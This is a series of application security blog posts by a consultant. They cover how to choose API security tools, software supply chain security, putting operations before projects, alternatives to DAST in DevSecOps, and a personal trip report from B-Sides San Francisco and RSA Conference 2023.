Quite often clients ask me “Which API Security Tool should I buy?”, and as you might have guessed I answer “It depends”, then proceed to ask them a dozen questions. Recently I asked a colleague at Semgrep if they felt this process might be of value to my readers, and Chinmay said “Absolutely!” and here we are with a new blog post.
If you are in charge of securing the software at your organization it is likely you have quite a few APIs under your purview, and that you might feel overwhelmed with the huge list of products on the market right now. Since 2021, this market has exploded with several new API security tools. In this article I am going to stress that what matters most when selecting a tool is what you need from them. There are several different functionalities that might interest you, depending upon your AppSec program, how invested the developers are, your SDLC methodology (waterfall, agile, DevOps, something else), your development environment (and the level of freedom your developers have), and your percentage of new types of applications (API/micro service) versus older types (enterprise, monolith).
Note: I’m going to speak about tools that work with the OpenAI/Swagger protocol in this article. For those using SOAP, your toolset will be significantly more limited than this, and some of these tools will not work for you. I gently suggest that for all new APIs you develop going forward that you use OpenAPI, as you will have significantly more options.
Common API Security Tooling Features:
Inventory – Finding all of your live APIs is VERY VALUABLE. There’s huge potential for there to be one or more APIs that you might have missed, living on your network, unprotected. Sometimes they call this feature enumeration.Fuzzing or dynamic automated testing, made for APIs (not web apps). Interacting with your API, sending it requests, and looking for problematic responses.
Web Application Firewall (WAF) for APIs, blocks malicious requests and responses.
API Gateway (a must have if you are putting your API on the internet!) Performs authentication and authorization, throttling, resource quotas, and more. If you want to fight bots, this is your #1 defense.
“Context” This is a new one that several vendors list as a feature, which means telling you more information about the API to help you prioritize what to fix, and what can be safely ignored. I’m not exactly sure how each of these work, but it’s a promise some of them make. You need to investigate exactly what this means before buying.
Static analysis (you can use a normal automated SAST tool for everything but the OpenAPI/Swagger file to find vulnerabilities in written code). No need to get a special tool.
API Linters help with code quality, but they can also be security-focused. Finding one that can open your OpenAPI file and find help you ensure your definition file (sometimes called a schema) can save you lots of bug-fixing time down the road.
Regular (non-API-specific) automated dynamic testing tools (DAST) are not very good at scanning APIs, even if the vendors tell you they are good. Unless it is a web proxy, and it’s in the hands of a Penetration Tester, assume they are not worth your time. Get an API-specific dynamic testing tool instead, which can understand your API, rather than older tools that were made for web apps.
Software composition analysis (SCA): APIs have dependencies too, but it’s the same as web apps, so use the same one you use for all your apps. No need to get a special tool.
I suggest an API gateway for every company, full stop. Ideally you are already doing SAST and SCA for your regular web apps with tools you already own/use, keep doing that for your APIs. For Dynamic scanners, you need an API specific one unless you want to spend many engineering hours making it work properly (time you could spend fixing bugs instead). There are also quite a few IDE plugins, but the key here is: which things are you concerned about? Go from there and you will find the right product. Most of these companies have 2-4 different functionalities. Figure out which one(s) you want, then do a proof of concept exercise (POC) with the finalists. After that, pick the winner!
Right now, the concept of the software supply chain and securing it is quite trendy. After the solar winds breach, the attack on the crypto wallet, at the log4J fiasco, the entire world appears to be focused on securing the software supply chain. I’m not complaining. If anything, as an application security nerd, I am quite pleased that I am finally getting buy-in that these things need to be protected, and that vulnerable dependencies need to be avoided. Folks, this is GREAT.
Software composition analysis, often called SCA, means figuring out which dependencies your software has, and of those, which contain vulnerabilities. When we create software, we include third party components, often called libraries, plugins, packages, etc. All third-party components are made-up of code that you, and your team, did not write. That said, because you have included them inside of your software, you have added (at least some) of their risk into your product.A ‘supply chain’ means all of the things that you need to create an end product. If you were creating soup, you would need all of the ingredients of the soup, you would need things like pots and pans in order to cook and prepare the ingredients of the soup, you would need a can or a jar to put it in, and likely a label on top to tell everyone what type of soup it is. All of those things would be considered your supply chain.
Imagine inside of your soup one of the ingredients is flour. Chances are that it (wheat) was grown in a field, and then it was harvested, and then it was ground down into flour, and then it might have been processed even further, and only then it was sent to you, so that you could create your soup. All of the steps along the way could have been contaminated, or perhaps the wheat could have rotted, or been otherwise spoiled. You have to protect the wheat all along the way before it gets to you, and once you make the soup, in order to ensure the end product is safe to eat.
Protecting all of the parts along the supply chain, from ensuring that there aren’t terrible chemicals sprayed on the ingredients as they grow, to ensuring that the can or jar that you put the soup into has been properly sterilized, is you securing your supply chain.
When we build software, we need to secure our software supply chain. That means not only ensuring the third-party components that we’re putting into our software are safe to use, but the way we are using them is secure [more on this later]. We also have to ensure how we build the software is safe, and this can mean using version control to store our code, ensuring any CI/CD that we use is protected from people meddling and changing it, and every single other tool we use or process we follow are also safe.
If you’ve followed my work a long time, I am sure you know that I think this includes a secure system development life cycle (S-SDLC). This means each step of the SDLC (requirements, design, coding, testing and release/deploy/maintain) contains at least one security activity (providing security requirements, threat modelling, design review, secure coding training, static or dynamic analysis, penetration testing, manual code review, logging & monitoring, etc.) A secure SDLC is the only way to be sure that you are releasing secure software, every time.
With this in mind, the difference between the two is that SCA only covers third party dependencies, while supply chain security also covers the CI/CD, your IDE (and all your nifty plugins), version control, and everything else you need in order to make your software. It is my hope that our industry learns to secure every single part of the software supply chain, as opposed to only worrying about the dependencies. I want securing these systems to be a habit; I want it to be the norm. I want the default IAM (identity and access management) settings for every CI/CD to be locked down. I want checking your changes into source control to be as natural as breathing. I want all new code check-ins to be scanned for vulnerabilities, including their components. I want us to make software that is SAFE.
If you read my blog, you are likely aware that I recently started working at Semgrep **, a company that creates a static analysis tool, and recently released a software supply chain security tool. If you’ve seen their SAST tool, you know they’re pretty different than all the other similar tools on the market, and their new supply chain tool is also pretty unique: it tells you if your app is calling the vulnerable part of your dependencies. They call it ‘reachability’. If your app is calling a vulnerable library, but it’s not calling the function inside of that library where the vulnerability lives, you’re usually safe (meaning it’s not exploitable). If you ARE calling the function that is inside your library where the vulnerability is located, there’s a strong likelihood that the vulnerability could be exploitable from within your application (meaning you are probably not safe). We added this to the product to help teams prioritize which bugs to fix, because although we all want to fix every bug, we know there isn’t always time. In summary, if the vulnerability is reachable in your code, you should run, not walk, back to your desk to fix that bug. Me, again
I have worked with more than one company who had programmers who did not check in their code regularly (or at all) to source control. Let me tell you, every single time it was expensive! Losing years of hard work will break your heart, not just your budget. Supply chain security matters.
Join me in this adventure by starting at your own office! Whether you have budget or not, there are paid and free tools that can help you check to see if your supply chain is safe! You can also check some of this stuff manually, easily (the IAM settings on your CI/CD are just a few clicks away). Reviewing the setup for your systems, and ensuring you have everything important backed up, will make your future less stressful, trust me.
You can literally join me on this adventure, by signing up for the Semgrep newsletter! The Semgrep Community is about to launch live free events, including training on topics like this, and we can learn together. First email goes out next week, don’t miss out!
~ fin ~
** I work at Semgrep. This means I am positively biased towards our products and my teammates (I think they are awesome!) That said, with 27+ years’ experience in IT, being a best-selling author and world-renown public speaker, there are a LOT of companies that would be happy to let me work for them. I choose Semgrep for a reason; my choice to work there was intentional. That said, I will try not to be annoying by only talking about work on my blog, promise!
Many years ago, when I was a software developer, a very smart boss said to me: “Tanya, it’s always operations first. Projects after.” At first, I was confused, how will I make any progress on my projects if I’m always doing operations? And, what the HECK is “operations” anyway? Reader, this was an incredibly important lesson that has helped me countless times, throughout my entire career.
At We Hack Purple (WHP), we have a rule: “operations first, then everything else”. Operations means all the stuff you already regularly do, that people are counting on you for. For instance, at WHP, every single week there’s a newsletter. If it’s late, our subscribers ask where it is. Subscribers expect it and enjoy receiving it. It is one of the services that we offer, and it’s part of our general operations.
Other examples of WHP operations: running payroll, answering support requests from students in our academy, emails from active clients, accepting/approving new community members, and moderating our online community if someone acts inappropriately. Imagine if my team and I were “too busy” to run payroll, or ensure students could log into their accounts, or to let new people into our community? It would become a huge bottle neck for the business, and WHP would be known for leaving people disappointed.
When I was a software developer, ensuring that all bugs were fixed, customer problems/complaints were addressed, all our apps were up and running, and that my entire team knew what they needed to do (and had the information/access/resources to do it), meant that then I could work on my projects. Ensuring people weren’t waiting on me not only meant I ran a smoothly running shop; it got me promoted. Multiple times!
Examples of Application Security ‘Operations’:
Attending project kick off meetings to make yourself known to the team
Provide security requirements for all new projects
Performing threat modelling sessions, and completing the paperwork afterwards
Following up on unfixed bugs
Checking in with your security champions, every month
Answering questions from… Everyone.
Running scans, reviewing scan results
Arranging pentests, reviewing results with dev team
Reporting up to management
Being ready, should a security incident occur
Recently I had a conversation with a client who was trying a new project management methodology, and we were talking about how to best implement it at their org. After about 10 minutes of discussing, I said “What about operations? Sounds like you’re not getting your everyday work done. If you can’t even finish up the close out of a security incident from 6 months ago, you don’t need a new project management system. You need to stop over-allocating the people on your team. Ideally, operations should take somewhere between 25-50% of your time, but it sounds like you have a lot of not-quite-finished work items. Get all that done, then start on new projects. And ensure you save time, every day, for operations.”
Note: it was 25-50% of the time *for her team* and the responsibilities they had, to run operations. For your team it might be higher or lower. When I was a software developer, I was told to never allocate a resource above 80%, because something always comes up. And they were right!
Be prepared, always add 20% to your time estimates for software projects. You’ll thank me.
If your team is supposed to review the architecture for every single software project, and you have allocated zero time for it, how do you think that’s going to go? It’s not going to be good, that’s for sure. It sounds obvious when I lay it out like that, and you might think “I would never do that”, but guess what? I see companies do this ALL THE TIME. And I know I have been guilty of this in the past, not realizing I had done it.
Any security activities that you want to do as part of the system development life cycle (SDLC) are part of your team’s operations. If there are documents to review, meetings to attend, scans to run, whatever, you need to ensure you have the capacity to perform these activities as needed. You can’t say “You must complete this 20-page architecture document, then receive our approval, before you start your coding phase” then proceed to make them wait several weeks for feedback from your team. Or… I guess technically you CAN do this, but it will cause a lot of problems, frustration, and delays for other teams. *Note: I would not recommend this strategy to friends.*
Then my client and I got into a discussion about the 3 ways of DevOps (as per The Phoenix Project and The DevOps Handbook), with the 1st way being “Emphasize the efficiency of the entire system”, the 2nd being “Fast Feedback”, and the 3rd way “Taking Time to Improve Your Everyday Work.” I LOVE DevOps, and in my opinion, The Three Ways are rules to live by if you work in IT.
I know I’ve talked to about The Three Ways of DevOps a lot, but they add value in SO MANY situations! I just can’t help myself, they are just SO GOOD.
The First Way of DevOps: Emphasize the efficiency of the entire system.
If security teams around the world took this to heart, people would like their IT Security co-workers a lot more. I have heard hundreds of times “We make them fill out all these forms, then we don’t have time to read them.” So…. Did you stop making them fill out the forms? “No.“
If instead the security team adopted the model of “operations first”, they would either 1) make those forms way less complicated and time consuming, and 2) allocate enough time for their team to properly review them, promptly. It is my wish that security teams would look at all the inputs (forms, meetings, documents, and so on) that they ask for from other teams, and then ensure they have capacity to use those inputs to their fullest, in efforts to protect their organizations. This might mean reducing risk, adding additional layers of security, preparing for potential disasters, etc. Security teams demanding other teams to perform work, and then not fully utilizing the work they asked for, makes me very upset. I used to be a software developer, and I have been put through the paces by a lot of management in my time, and I’m quite tired of filling out templates that no one ever reads… And I know I am not the only person who feels this way!
The Second Way of DevOps: Fast Feedback
I tend to add onto this phrase and change it from ‘fast feedback’ to ‘feedback, that is accurate, and gets to the right person/people, fast”. Who cares if the feedback is fast if it never gets to its intended destination? Or it’s completely inaccurate so it sends someone on a wild goose chase? That is not helpful.
This is another area where if we do ‘operations first’ that we will see some big benefits. Whenever a project team asks for feedback from the security team, if we turned that around very quickly it would enable the project to finish that part ON TIME. Meaning the rest of the project could potentially also finish ON TIME. Being on time, on budget, and pleasing the customer with the end product, is the trifecta of “this project succeeded”. That’s what we all want, successful projects.
While many teams ask the security team for feedback constantly, there are others who hide stuff from the security team. When other teams hide things from us, it’s often because we take so damn long to provide feedback and/or the feedback we provide is not helpful. I suspect that if security teams that gave fast feedback, regularly, would receive more requests. “Hey, we’re planning on doing XYZ, any chance we could run our design by you?” is a sentence I dream about hearing. When the other IT teams come to us, instead of us chasing them around, we have created a trusting relationship!
The Third Way of DevOps: Taking time to improve your daily work.
When I think of The Third Way, I try to apply it not only to MY daily work but also to ‘other people’s daily work that I affect’. If I can take an afternoon to tighten up the configuration on a tool, to remove some false positives it was spitting out, this could potentially affect the daily work for several of my co-workers (usually developers). If I spend 4 hours doing this, but it saves about one hour of time for each of my 100 developers that year, that’s a fantastic return on investment (ROI).
Another way in the past that I have applied this principal is by creating 1-page ‘best practice’ documents for various technologies. If one project team is building a serverless app, and I need to give them some guidelines, why not reuse those guidelines next time? Plus, for every new project using that same technology within our org? We could provide it even if they didn’t ask for it, we have the options to provide best practices information by default. And in my case, as an independent consultant, author, community manager, and public speaker, why not share that research in a blog, conference talk, or book? Why not share this work with as many other humans as possible, so that, as an industry, we can ALL move forward? (You don’t have to think that big, but, as usual, I digress.)
When we are putting operations first, before we work on projects, you might think that The Third Way is not in line with this thinking, but it is! It’s about finding better efficiencies for when we are performing operations. Improving what we do, day in and day out, so we do a better job and/or we can do it faster, from then on. It’s an investment in improving our organization’s operations as a whole, going forward. We are improving our our futures.
Tip: Double your time estimates. A boss told me this long ago, and at the time I thought he was nuts. The idea with doubling your estimate is that 1) technical folks are famous for underestimating how long something takes to do and 2) if you finish early you look like a rock star! This only works if you are the only person to double it though, I once had a boss who doubled my estimate, and his boss also doubled it, and by the time it got to the big boss it looked like it was going to take 6 months for me to make two windows forms… That was not so good…
Back To Operations
Back to the topic at hand: putting operations first. If you are not able to get through your inbox, you probably shouldn’t take on another new project. If you have several other teams waiting on you, for a process that your team is forcing them to go through, you should likely not purchase yet another tool. If you don’t already have your current toolset fully operationalized (for example, having a SAST and SCA scan performed on every PR, as opposed to manually performing 1-off scans from time to time), then you are not ready to add yet another security step to the SDLC. If you aren’t meeting your current operational requirements, you cannot (successfully) take on new projects.
Last tip! Help your teammates, especially those with less experience and seniority, prioritize and reprioritize their work, often. I’ve seen many people become a bit lost, or feel overwhelmed, because their list has gotten out of hand. Often there are things on the list that you, as their boss, are completely unaware of. Take that stuff off, and go talk to the other managers who are trying to offload their responsibilities onto your team…
– Me, again
If every single day you never finish your work, if your inbox has people writing you multiple times asking the same question because you still haven’t answered, if you feel like you are drowning at work; it’s time to look at your operational capacity, and make sure you haven’t over allocated yourself or your team. It’s always better to do a fantastic job of your current responsibilities, than to have several unfinished projects and really frustrated stakeholders.
I want to get something straight: you do not need to put a dynamic scanning tool into your CI/CD pipeline in order to do DevSecOps properly. You don’t even necessarily need to use automated dynamic analysis at all, to be doing DevSecOps.
I do regular consulting via IANs Research and quite often I find myself assuring clients that “Yes, what you are doing makes perfect sense. You are covering all of your bases. In fact, you’re doing a GREAT JOB.”
So why the mystery? Why the uncertainty? Let’s dive a little deeper.
What IS Dynamic Analysis?
Dynamic (when referring to a system, not a person) meansconstant change, activity, or progress. When we perform dynamic types of testing on a technology system, that means interacting with it as it is running. This could mean using live software, that is hosted on a web server, or a smart fridge that is turned on, with real food inside of it.
Dynamic testing can be performed from within an application, which is what IAST (Interactive Application Security Testing) products promise: testing your running app from the inside out. More commonly dynamic analysis is performed from outside the application, often with a web proxy, an automated DAST (Dynamic Application Security Testing) tool, or manually with a web browser or direct calls to the system (such as API calls).
Some of the advantages of dynamic analysis include; You get to see how it actually works, you can discover if some of the behaviours are not what you were planning from a business perspective, you could try to find business logic issues (which are often cause by design flaws), and you can validate whether a vulnerability found by an automated tool is exploitable (or not).
A DAST (Dynamic Application Security Testing) is generally considered a software product that scans web applications and API for vulnerabilities, (generally) performing both active and passive scans. It works in a completed automated way, such that you do not need weeks, months or years or training to be proficient with it. Sometimes DAST tools are also called a VA (vulnerability assessment) scanner or a ‘web app scanner’.
The most obvious disadvantage of dynamic testing is that you can’t see the code. This is often called black box testing, where you don’t get to know the design, the functionality, or anything else about the application before you perform your test. Being able to see how the code works, or a network or architecture diagram, can help someone with a malicious mindset find more vulnerabilities faster.
A web proxy is a software product that can be used for manual, dynamic, security testing. Penetration testers often use web proxies while testing APIs and web applications. Sometimes products combine both the DAST and Web Proxy functionality into one product, and, unfortunately, those are often called a DAST or Web Proxy, as though the terms are interchanged, which leads to more than a little confusion.
Other disadvantages of dynamic testing are that there are a whole bunch of different types, and sometimes it gets confusing. When using an automated DAST scanner, pretty much anyone could operate it (this is an advantage). This means that the bar to entry is very low, and you don’t have to hire an expert, which can be expensive, and it can also be quite difficult to attract that type of talent on a permanent basis. That said, automated dynamic scanners, when operated by someone without very much training, can result in bad data being injected into your database, not testing your entire attack surface, inability to talk directly to APIs, and more. Although it’s wonderful to have this automated functionality scanning legacy apps, and finding lots of old bugs in your ancient code, for more modern apps… Some automated DAST tools leave a lot of untested attack surface behind.
It should be noted that each DAST and each web proxy product works differently. Some have great scheduling automation options, some don’t. Some are only able to automate passive scanning, while others can do both active and passive scanning. Not all options discussed in this article are available for all products.
Me, based on comments from my friend Rick
This brings me to penetration testing. Penetration testing usually involves a whole bunch of tools, an entire toolbox, if you will. It also generally involves at least one extremely skilled security testing expert. They manually test the application by using a series of tools (some automated, some not), to find as many bugs as possible, then validate each one’s exploitability. They only report what they feel to be legitimate business risks, vulnerabilities, or other issues that they feel could hurt your system, your business, your employees, users, or customers. Just the important stuff!
But there are more types of dynamic testing than just automated DAST and PenTesting, and all of them count under the giant umbrella of the term dynamic. Performance testing, stress testing, DDoS testing. All of those are dynamic, they interact with your application to find out if there are problems you should be aware of.
In addition to the traditional DAST scanners, there are newer fuzzing and dynamic scanners that are created only for APIs (application programming interfaces), and they are looking more and more promising every month. In 2020 and 2021, several new API companies came on the market, with amazing new products. A lot of them offer dynamic forms of analysis that are different than anything I had seen before.
One of the examples I saw recently, in San Francisco as part of the RSA festivities, was an IDE plugin that would allow the developer to fuzz each one of the fields within their API, in an automated fashion. Fuzzing means adding in all sorts of bad input, to test the input validation of a system. The person demoing it for me, Isabelle Mauny, showed me how it could look at the API definition file, then automatically generate tests for you. Holy smokes, nothing like that existed when I was a dev!
I’ve also seen some really amazing functionality involving monitoring for data that is being exfiltrated (watching for potential data breaches). A regular web application firewall can be configured to watch for unusually large HTTP responses (think: a whole heck of a lot of data, way more data than makes sense). And that can be quite helpful. However, some of the web application firewalls made for APIs, another monitoring product for APIs, can watch for when you have made a grave error in your access control. They can check to see if perhaps the request that you created has brought back more records than it should have, or different fields that were not expected to be brought back. With the biggest threats to APIs (according to the OWASP API Security Top Ten) being broken authorization at all levels, that’s some pretty spectacular coverage. Although this is more of a shield, than a dynamic test so to speak, we have to choose what reduces business risk the most, and this might protect you from a myriad of issues that an automated tool would likely miss.
Other nifty dynamic functionality that is made only for APIs include inventory tools. Often, they perform active (sending their own test requests) or passive (checking requests and responses for security problems, but never sending their own requests) dynamic scans at the same time they perform inventory, telling you immediately if they spot something new that might be a problem in your API. They can find all your APIs, including some that you thought were decommissioned months or years ago! I personally find this to be an extraordinary step forward in making sure that you have complete tooling coverage of your application portfolio. When I started in AppSec, I would never have imagined that I could have tools that could stop an error within just a few minutes of it being released into prod!
On top of this is WHERE you can do testing with all of these cool new dynamic tools. You can test directly in the IDE (integrated development environment), AS YOU WRITE YOUR CODE! That’s amazing, and the furthest ‘left’ security could ever push from a tooling standpoint. Some of them can be run nightly, or even continuously, in your production environment. When I started in AppSec, I had to manually run every single scan for dynamic tests. Now I can ‘set it and forget it’, only receiving reports when it finds new bugs. It’s a security nerd’s dream come true!
This leads me back to the title of this blog post: you truly do not need to run an automated DAST product in your CI/CD to say you’re doing DevSecOps. It is NOT a requirement! You can run all sorts of different types of dynamic tools, in several different places (IDE, against prod and pre-prod, continuously in prod, or CI/CD), and still do a great job and have excellent coverage. The key with DevSecOps is ensuring whatever you do follows the processes of the DevOps folks where you work and that it works within the Three Ways of DevOps (providing fast feedback, optimizing efficiency for the entire system, and aiming for constant improvement and learning).
If the way you run your tools slow down the pipeline for everyone, that’s not a win. If the tools you choose don’t get you good coverage, that’s not a win. If the tools you have report a lot of false positives, that’s never a win. Instead of trying to follow what the vendors and marketing materials tell us, focus on finding what creates the best results for YOUR org. Every dev shop is unique, and thus your security program will be too!
Potential alternatives to running an automated DAST in your CI/CD:
Automating a DAST to run monthly, overnight, receiving an email in the morning: set it and forget it!
Focusing almost exclusively on static forms of analysis (SAST, SCA, code review, secret scanning), and then pentesting the important apps once a year (pentesting is a form of dynamic testing)
Move towards a micro service architecture, where the front-end GUI is dumb (no business logic) then, when you’re ready, switching your old toolset for modern API-specific tooling, plus continuing with static and other forms of testing.
Use DAST manually, but only for legacy monolithic apps (think of it as backwards compatibility), PenTest the 2-5 most important apps, then use API tools for dynamic testing of APIs, plus (continuous) monitoring and inventory for extra coverage.
Ditch all dynamic testing, and just do static forms of testing (only recommended if you have a limited budget and you only have time and money for one tool, and for some reason do not want to use free DASTs).
Install an IAST tool into all of your apps, and use it in pre-prod environments and/or prod environments. Then you could skip DAST, or just PenTest the important apps, on top of the IAST.
PenTest everything, once a year (most expensive option, and certainly not the best, but I’ve seen it)
PenTest just your 3-5 most important apps then cross your fingers for the rest of them (not recommended, but more popular than you might think!)
None of the above options include non-tooling activities and support you can provide, which I always recommend in addition to tooling!
Training (secure coding, how to use security tools, secure design, threat modelling, etc.)
Security best practice instructions for each type of technology
Architecture and design review
Security requirements for every project
Security Champion programs
I could go on forever! There are many other ways than just buying tools to support a secure system development life cycle (S-SDLC or SSDLC).
All of this aside, try not to let yourself get too caught up in what you read on the internet (this blog post included) and instead focus on what you and your team feel gets you the best coverage, fits your budget, and works WITH the developers and the processes they use. If you’re really struggling, it might be time for a change.
As you might have been aware if you read my blog, I spoke at B-Sides San Francisco and RSA Conference 2023, and it was GREAT! Below is a report about my trip, and all the wonderful people, places, and activities I saw and participated in from April 21-28, 2023.
April 22: I flew into San Francisco late on Friday the 21st, to wake up on Saturday to have breakfast with my two friends Ashish Rajan and Shilpi Bhattacharjee, the hosts of the Cloud Security Podcast (which obviously you need to subscribe to if you work in that field. Right now. Don’t worry, I’ll wait.)
During breakfast we filmed a ridiculous little video for our panel event with Snyk on Tuesday of this week, you can see it below. I then went to B-Sides San Francisco and saw a LOT of amazing talks.
We also recorded an episode of their podcast together!!!!
There were several more good ones, but I couldn’t see them all!
I realize that if you’re a regular viewer of The Cloud Security podcast you might not recognize Shilpi, that’s because she’s generally behind the camera, as the producer of the show, but she is an equal partner in all the content the show creates. Plus, she’s wonderful!
Then I attended even more talks at B-Sides SF that were really good, and then finally came the time to give my talk. Being the very last talk, but not a keynote, at a 2-day-long event, is a hard time slot, but some people still came to it anyway. Here’s a link to a video of my talk, ‘Secret Hunting’ and a link to the corresponding blog post.
I also was interviewed by Buu Lam of F5 in the lobby of the AMC where B-Sides was held, video below. You all know how much I adore Buu!!!! It’s a fun interview.
This morning I had a private meeting for work. Although I can’t tell you about it, being able to shake hands with someone, in person, with whom you are going to do some serious work, is a pretty amazing feeling in this ‘post-covid’ world.
At lunch time on Monday, I went to the Microsoft Hub to be on a panel at an event called Women’s Executive Lunch. I usually say no when conferences invite me to be on this sort of panel, because if everyone else is on all the other stages talking about AppSec, and the whole conference is about AppSec, I don’t want to be the side show. I want to be on the main stage, talking about the main topic. I also don’t want to be known as “a woman in tech”, I want to be known as an expert in application security, which is what I am. Being female should be secondary (or not important at all), or at least that’s what I would prefer when it comes to my career and professional reputation. When everyone else is talking about a technical topic, I don’t want to be off topic. I also don’t want to talk about something that no one came there to learn about; most people don’t buy a ticket to a technical conference in hopes to learn about ‘women in tech’. I also think that most the people at a conference who would come to such a talk are already on board with the whole “turns out women deserve the same rights as men” thing, and thus we are preaching to the choir. The people who need to hear it aren’t going to choose to go to that room. They are going to skip it.
But when Microsoft asked me to address a group of women and allies, at an event aimed only to help, support, and promote women in tech, I jumped at the chance. To me, this is completely different to what I described above; we were there to try to provide answers, assistance, and encouragement, at an event dedicated only to this topic and cause. And that, my friends, is very much in line with my beliefs and what is important to me.
Also: I suspected that if I attended that I might get another hug from Ann Johnson (#careeraccomplishment). AND I DID!!!!! Note: last time I got a hug from Ann was when I won “Hacker of the Year” 2019, in Vegas as part of hacker summer camp. You need to be particularly amazing in order to earn this privilege. #worthit
After the panel was over, I had to run over to #DevOpsConnect stage, run by TechStrong, a track at RSA dedicated only to DevOps, DevSecOps and other AppSec nerding, topics that are right up my alley. I was on right after DJ Schleen, and other amazing humans who presented on that track the same day, including Caroline Wong and Shannon Lietz.
My talk was about what software developers should do when there is a security incident, when to call the Incident Response (IR team) and how to not ruin evidence, plus please-don’t-think-you-are-saving-the-day-when-really-you’re-creating-a-big-mess. It went pretty well, despite me being a sweaty mess from running across SF to get there on time! Although there’s no live recording of it, WHP has a course about itin the academy.
After that I had another work meeting, but then I got to have some fun: I had the chance to meet with my friend Isabelle Muany from 42Crunch. She’s the founder of her company, but also, in my opinion, someone who really wants to help developers create more secure APIs. She’s very dedicated to this topic, and if you’re interested in securing your APIs, following her is a great idea. You can see a past presentation she did for WHP here. She’s also going to be on the We Hack Purple podcast soon, don’t miss it!
After that, I went to the RSA Speaker’s dinner in hopes of meeting up with my dear friend Vandana Verma. Although I ended up missing her (I showed up late, my bad) I DID have the chance to run into Jessica Robinson, Chris Romeo (of Security Journey and AppSec podcast fame) and Kim Wuyts, who you may remember I met for the first time in Dublin, Ireland earlier this year at OWASP Global AppSec 2023. She gave an amazing keynote about threat modelling privacy, and made me think of ‘building privacy in’, in a whole new way.
Tuesday April 25
Tuesday started off with a ladies’ breakfast for the Forte Group. Forte is a non-profit made up of women CISO, CEOs, and startup founders. Chenxi Wang and a few of us started it just after covid began, because we wanted to hang out other amazing women. Chenxi changed it from “Friday afternoon happy hour” into a vibrant community of incredibly powerful women from our industry, who share knowledge and support each other. Forte group has helped my business and my career immensely, and it’s also been quite a bit of fun. Hats off to Chenxi and the rest of the board members for working very hard to help lift other women up. ALSO, breakfast was a blast!
After the first breakfast I went to my second breakfast event of the day, which was sponsored by SemGrep and Tromzo, where I got to see lots of familiar and wonderful faces such as Jim Manico and Robert Wood of The Soft Side of Cyber. The restaurant served us food that was very pretty and fancy, but it contained almost no calories… Glad the ladies’ breakfast actually fed me… Being a small company owner, I am always on the hunt for free food, lol.
After that I did a quick sound check for an event, then went to the Mend Booth to do a book signing… Except my books were nowhere to be found! I was so embarrassed, there was some sort of shipping error. Instead, I interviewed their CEO Rami Sass live, and then we recorded another one and released it on social media . Despite the mix up, we ended up having a really good time, plus they gave me a few blog post ideas, we made fun of SBOMS (why didn’t the USA executive order demand that people verify if their dependencies were vulnerable? Or document transitive dependencies too? It felt so underwhelming…), and I now have several MEND water bottles!
From there I went on to my panel for #Snyk with Caroline Wong and Ashish Rajan! You can watch the video of us here: You can see how stylish we are and our amazing chemistry in the image above! Shilpi was behind the camera, ensuring we looked and sounded our best.
If you think this day didn’t have enough action… Then I went to the IANS Faculty Party! I’m a member of IANs Research faculty, where I work with such amazing humans as; Nicole Dove, Olivia Rose, Mick Douglas, Shannon Lietz, Wolfgang Goerlich, Jake Williams, and… Well, you get the picture. Lots, and lots and lots of amazing humans are part of the faculty, plus the staff are wonderful. We got to have a few drinks and chat in person, which is a change from our usual Slack channel conversations that scroll off the screen. It’s always a pleasure when I have a chance to see them. No photos from this event.
After this I was supposed to attend another party where I was finally going to get to see my friend Vandana, but instead I ordered tasty Asian food from some app on my phone (I was in San Francisco, after all) and stayed in. I had a big day to get ready for. Plus, my legs hurt from climbing one of those famous San Francisco hills…
Wednesday April 26
This morning started with another women-in-tech breakfast, but smaller and only Forte ladies. I then went to film an interview with TechStrong that you can watchhere.
From there I went to yet another sound check, then did my “Adding SAST to CI/CD, Without Losing Any Friends” workshop for RSAC with my friend Clint Gibler. We joked around, talked about Static Analysis, and made SemGrep find a lot of bugs in OWASP Juice Shop. It was a total blast! And…. We’re accepted to give it again this summer at B-Sides Las Vegas! If you missed us at RSA, don’t worry, you can still see it at #HackerSummerCamp.
From there I did a book signing at the RSA Bookstore, had more private meetings, then had the absolute pleasure of spending dinner and the rest of my evening with my friend Laura Bell of Safe Stack. Below is a picture of us being silly.
Thursday April 27
Today was the big day, THE DAY I KEYNOTED #RSAC. I remember when they sent the invite for me to be the keynote. I thought “Is this a mistake? Did they mean someone else?” But no, it was me!!!!! I was supposed to do all sorts of things that morning (sorry if missed you!), but instead I practiced my talk over and over again. Before I went on, the backstage crew asked me multiple times: “Are you nervous?” They asked so many times that I started to become nervous. Before I went on, I thought to myself “Just be yourself. Talk passionately about this because this is very important to you. Tell stories. Be real. It will be fine.” And it was fine! Moreover, it was better than fine. People laughed when they were supposed to laugh, and didn’t when they weren’t supposed to. The recording is below (plus give me a thumbs up if you watch it on YouTube). In addition, here’s an article someone wrote about it, with a summary of all the points I made.
From there, I floated on a cloud to the AppSec Village, of which We Hack Purple is a proud sponsor, to sign copies of my books and give away more stickers. Video below of Liora and I! AppSec Village was founded by Erez Yalon and Liora Herman, and if you’re going to be at Def Con this summer you should definitely go check it out! I plan to be there.
After the AppSec Village hangout, I did something called a “Birds of a Feather” event with RSA. Many of us met to discuss how to create a more positive DevSecOps culture, getting buy in for fixing bugs, and “please don’t turn off my tools!!!!”. It might sound unusual, but I love situations where I get to learn from the audience. When people ask questions, or tell me “At our office, we do this, and here’s why”, I love it. If you have a chance to attend one of these, you should. I know that *I* learned a lot.
After that I got to have dinner with my friend Anshu BansalofCloudDefensel.ai, who was recently on the We Hack Purple Podcast, see his episode here. I’ve been an advisor at Cloud Defense since it was a drawing on the back of a napkin, and I cannot tell you how proud I am of Abhi Aroura and Anshu, the two founders, who I am proud to my friends!
To finish off my trip, I had a We Hack Purple in-person meetup! We drank bubble tea, traded stickers, and stories! Below is a pic! I also FINALLY had a chance to spend some time with my wonderful friend Vandana Verma, who had flown in all the way from Bangalore, India!
Throughout all the events I listed, I also had several private business meetings. Some were great, some okay, and some did not go very well at all. I didn’t bother documenting them all here, but there were 28 meetings and events in total, plus a few surprise things that got added last minute. All in all, I would call this a very successful trip!
Friday April 28
